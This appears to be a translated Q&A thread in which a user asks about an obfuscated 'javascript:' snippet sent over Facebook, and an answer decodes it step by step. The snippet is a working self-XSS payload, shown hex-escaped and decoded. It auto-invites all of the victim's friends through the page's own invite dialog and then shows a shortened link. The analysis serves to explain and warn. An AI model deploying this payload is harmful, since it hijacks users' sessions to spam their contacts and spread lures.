地址栏中的Javascript-这是恶意的吗? [英] Javascript in the address bar - is this malicious?


问题描述

我在Facebook上收到一条消息,告诉我将其复制并粘贴到我的地址栏中.我以为我会在这里张贴它,看看每个人对此有何看法.它有什么作用?它是如何工作的?

I got a message on Facebook telling me to copy and paste this into my address bar. I thought I'd post it here and see what everyone thinks about it. What does it do? How does it work?

这是源代码:

// (DO NOT DO THIS!)
// Sample exactly as it was sent: a `javascript:` URL that the message asks the
// reader to paste into the address bar. Code run that way executes inside the
// page that is currently open, with that page's logged-in session.
// Every string is written as \xNN hex escapes and stored in the array `a`; the
// rest of the script reaches property names, markup and URLs only by index
// (a[0] .. a[13]), so nothing is readable without decoding the array first.
// The decoded strings are shown in the formatted listing further down the page.
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
// Overwrite an element's innerHTML with the markup in a[3], then look up the
// element whose id is a[4] (an id that the injected markup itself carries).
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);
// Build a synthetic event of type a[7] and dispatch it on that element, so the
// page reacts as if the user had clicked the injected link themselves.
var c=document[a[6]](a[5]);
c[a[8]](a[7],true,true);
void (ss[a[9]](c));
// Three timers (4000, 5000 and 5400 ms) act on whatever the click opened.
// `fs` and `SocialGraphManager` are not defined in this snippet; presumably they
// are globals supplied by the host page. Verify against the page's own scripts.
void (setTimeout(function (){fs[a[10]]();} ,4000));
void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000));
// Last step: replace the first element's content again, this time with a second
// hex-escaped markup string (an anchor pointing at a shortened URL).
void (setTimeout(function (){
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E";
} ,5400));

推荐答案

以下是格式化的源:

// Deobfuscation step 1: the same script with the \xNN escapes decoded and
// whitespace added. `a` is still the lookup table; the statements below still
// index into it, so read a[n] against the positions listed here (0-based).
var a = ["innerHTML", 
         "app4949752878_app4949752878_dd", 
         "getElementById", 
         // a[3]: anchor whose `ajaxify` attribute points at the invite dialog for
         // one specific node_id, labelled "Suggest to Friends".
         "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>",
         "suggest", 
         "MouseEvents", 
         "createEvent", 
         "click", 
         "initEvent", 
         "dispatchEvent", 
         "select_all", 
         "sgm_invite_form", 
         "/ajax/social_graph/invite_dialog.php", 
         "submitDialog"];

// document.getElementById(a[1]).innerHTML = a[3]: inject the anchor.
void (document[a[2]](a[1])[a[0]] = a[3]);
// document.getElementById("suggest"): fetch the anchor that was just injected.
var ss = document[a[2]](a[4]);
// document.createEvent("MouseEvents") + initEvent("click", true, true):
// a bubbling, cancelable synthetic click.
var c = document[a[6]](a[5]);
c[a[8]](a[7], true, true);
// dispatchEvent: fire the click on the injected anchor without user interaction.
void ss[a[9]](c);
// fs.select_all() after 4 s. `fs` is not defined in this snippet; presumably it
// is a global of the dialog opened by the click. Confirm against the page.
void setTimeout(function () {fs[a[10]]();}, 4000);
// SocialGraphManager.submitDialog("sgm_invite_form", <invite endpoint>) after 5 s.
void setTimeout(function () {SocialGraphManager[a[13]](a[11], a[12]);}, 5000);
// After 5.4 s, swap the element's content for a "Completed! Click here" link to
// a shortened URL; its final destination cannot be determined from this page.
void setTimeout(function () {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400);

a 数组保存该代码使用的所有字符串.
下面是把这些字符串代回原位之后的代码:

The a array holds all strings used by the code.
Here it is with the strings put back in place:

// Deobfuscation step 2: every a[n] lookup replaced by the string it stood for,
// so the DOM and page-API calls are now readable as ordinary property access.
// Each `void` makes its statement evaluate to undefined; in a `javascript:` URL
// a non-undefined result would replace the current page with that value.

// Inject a "Suggest to Friends" anchor wired (via `ajaxify`) to the invite
// dialog for node_id 112682695418523.
void (document.getElementById('app4949752878_app4949752878_dd').innerHTML =  "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
// Fetch the injected anchor and fire a synthetic, bubbling click on it.
var ss = document.getElementById("suggest");
var c = document.createEvent("MouseEvents");
c.initEvent("click", true, true);
void ss.dispatchEvent(c);
// 4 s later: call select_all() on `fs`. `fs` is not defined here; by its name
// the call looks like it selects every entry in the opened dialog. Confirm.
void setTimeout(function () {fs.select_all();}, 4000);
// 5 s later: submit the form with id "sgm_invite_form" to the invite endpoint
// through the page's own SocialGraphManager object (not defined in this snippet).
void setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
// 5.4 s later: replace the injected anchor with a "Completed! Click here" link
// to a shortened URL whose destination is not visible from this page.
void setTimeout(function () {
    document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);

最后,这是换上了恰当的变量名并整理好结构之后的版本:

Finally, here it is with decent names and structure:

// Final readable form of the pasted script. Nothing here is downloaded or
// exploited in the usual sense: the script only drives the page's own UI and
// script objects, and it runs with the session of whoever pasted it.
// Apparent net effect (inferred from the names and the endpoint, so confirm):
// the invite dialog for one node_id is opened, every entry is selected and the
// form is submitted, all without the user choosing any of it.

// Element the script uses as its scratch area; the same element later shows the
// "Completed!" link.
var messageElement = document.getElementById('app4949752878_app4949752878_dd');

// Inject an anchor whose `ajaxify` attribute targets the invite dialog for
// node_id 112682695418523 (class=FanManager).
messageElement.innerHTML = 
    "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";

// Simulate a user click on the injected anchor (bubbling and cancelable), so
// the page's own click handling runs as if the user had clicked it.
var suggestLink = document.getElementById("suggest");
var mouseEvent = document.createEvent("MouseEvents");
mouseEvent.initEvent("click", true, true);
suggestLink.dispatchEvent(mouseEvent);


// The fixed delays (4000 / 5000 / 5400 ms) presumably give the dialog time to
// load before each step; the script does not check that it actually did.
// `fs` is not defined in this snippet (presumably a global of the opened dialog).
setTimeout(function () { fs.select_all(); }, 4000);
// Submit the invite form through the page's own SocialGraphManager object.
setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
// Cover the traces with a "Completed! Click here" link to a shortened URL; where
// that link ultimately leads cannot be determined from the code shown here.
setTimeout(function () {
    messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);
